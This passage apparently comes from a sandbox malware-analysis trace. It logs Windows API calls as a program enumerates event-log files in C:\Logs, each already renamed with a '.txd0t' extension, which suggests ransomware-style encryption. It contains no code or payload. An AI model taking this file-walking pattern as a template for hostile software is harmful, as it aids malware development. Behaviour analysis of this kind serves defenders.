psz2=".") returned 1 [0118.493] StrCmpW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t", psz2="..") returned 1 [0118.493] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.493] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.493] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t" [0118.493] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t") returned=".txd0t" [0118.493] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.493] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4169a7a, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4169a7a, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x599d774c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t", cAlternateFileName="MIF88B~1.TXD")) returned 1 [0118.493] StrCmpW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t", psz2=".") returned 1 [0118.493] StrCmpW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t", psz2="..") returned 1 [0118.493] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.493] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.493] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t" [0118.493] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t") returned=".txd0t" [0118.493] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.493] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59833cec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t", cAlternateFileName="MI3F07~1.TXD")) returned 1 [0118.493] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t", psz2=".") returned 1 [0118.493] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t", psz2="..") returned 1 [0118.493] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.493] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.493] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t" [0118.493] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t") returned=".txd0t" [0118.493] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.493] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59859f59, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t", cAlternateFileName="MI388C~1.TXD")) returned 1 [0118.494] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t", psz2=".") returned 1 [0118.494] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t", psz2="..") returned 1 [0118.494] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.494] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.494] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t" [0118.494] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t") returned=".txd0t" [0118.494] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.494] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41b5f2d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd41b5f2d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59880168, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t", cAlternateFileName="MIA697~1.TXD")) returned 1 [0118.494] StrCmpW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t", psz2=".") returned 1 [0118.494] StrCmpW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t", psz2="..") returned 1 [0118.494] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.494] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.494] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t" [0118.494] PathFindExtensionW (pszPath="Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t") returned=".txd0t" [0118.494] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.494] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd389efbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd389efbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x598a6465, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t", cAlternateFileName="MI0A82~1.TXD")) returned 1 [0118.494] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t", psz2=".") returned 1 [0118.494] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t", psz2="..") returned 1 [0118.494] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.494] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.494] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t" [0118.494] PathFindExtensionW (pszPath="Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t") returned=".txd0t" [0118.494] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.494] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd38c5212, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd38c5212, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59918b0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x111200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t", cAlternateFileName="MI1D55~1.TXD")) returned 1 [0118.494] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t", psz2=".") returned 1 [0118.494] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t", psz2="..") returned 1 [0118.494] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.494] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.494] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t" [0118.494] PathFindExtensionW (pszPath="Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t") returned=".txd0t" [0118.494] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.494] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59c861d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t", cAlternateFileName="MI7CA9~1.TXD")) returned 1 [0118.494] StrCmpW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t", psz2=".") returned 1 [0118.494] StrCmpW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t", psz2="..") returned 1 [0118.495] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.495] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.495] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t" [0118.495] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t") returned=".txd0t" [0118.495] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.495] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x599b1edc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x211200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t", cAlternateFileName="MIF836~1.TXD")) returned 1 [0118.495] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t", psz2=".") returned 1 [0118.495] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t", psz2="..") returned 1 [0118.495] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.495] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.495] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t" [0118.495] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t") returned=".txd0t" [0118.495] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.495] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x599d774c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t", cAlternateFileName="MICF1D~1.TXD")) returned 1 [0118.495] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t", psz2=".") returned 1 [0118.495] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t", psz2="..") returned 1 [0118.495] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.495] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.495] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t" [0118.495] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t") returned=".txd0t" [0118.495] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.495] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85798667, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x85798667, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x599d774c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t", cAlternateFileName="MI73AA~1.TXD")) returned 1 [0118.495] StrCmpW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t", psz2=".") returned 1 [0118.495] StrCmpW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t", psz2="..") returned 1 [0118.495] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.495] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.495] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t" [0118.495] PathFindExtensionW (pszPath="Microsoft-Windows-AppxPackaging%4Operational.evtx.txd0t") returned=".txd0t" [0118.495] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.495] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74d25ab, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74d25ab, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x599fd8b5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t", cAlternateFileName="MI7FF0~1.TXD")) returned 1 [0118.496] StrCmpW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t", psz2=".") returned 1 [0118.496] StrCmpW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t", psz2="..") returned 1 [0118.496] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.496] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.496] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t" [0118.496] PathFindExtensionW (pszPath="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t") returned=".txd0t" [0118.496] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.496] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f96ca4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe1f96ca4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59a23b0e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t", cAlternateFileName="MID4A4~1.TXD")) returned 1 [0118.496] StrCmpW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t", psz2=".") returned 1 [0118.496] StrCmpW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t", psz2="..") returned 1 [0118.496] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.496] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.496] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t" [0118.496] PathFindExtensionW (pszPath="Microsoft-Windows-Bits-Client%4Operational.evtx.txd0t") returned=".txd0t" [0118.496] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.496] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8783aa15, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8783aa15, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59a23b0e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t", cAlternateFileName="MIC2D9~1.TXD")) returned 1 [0118.496] StrCmpW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t", psz2=".") returned 1 [0118.496] StrCmpW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t", psz2="..") returned 1 [0118.496] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.496] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.496] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t" [0118.496] PathFindExtensionW (pszPath="Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t") returned=".txd0t" [0118.496] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.496] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3c71c5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3c71c5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59c861d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t", cAlternateFileName="MICB90~1.TXD")) returned 1 [0118.496] StrCmpW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t", psz2=".") returned 1 [0118.496] StrCmpW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t", psz2="..") returned 1 [0118.496] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.497] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.497] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t" [0118.497] PathFindExtensionW (pszPath="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t") returned=".txd0t" [0118.497] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.497] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59c861d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t", cAlternateFileName="MI6817~1.TXD")) returned 1 [0118.497] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t", psz2=".") returned 1 [0118.497] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t", psz2="..") returned 1 [0118.497] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.497] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.497] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t" [0118.497] PathFindExtensionW (pszPath="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.txd0t") returned=".txd0t" [0118.497] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.497] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59a49db1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t", cAlternateFileName="MI7A4F~1.TXD")) returned 1 [0118.497] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t", psz2=".") returned 1 [0118.497] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t", psz2="..") returned 1 [0118.497] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.497] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.497] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t" [0118.497] PathFindExtensionW (pszPath="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t") returned=".txd0t" [0118.497] 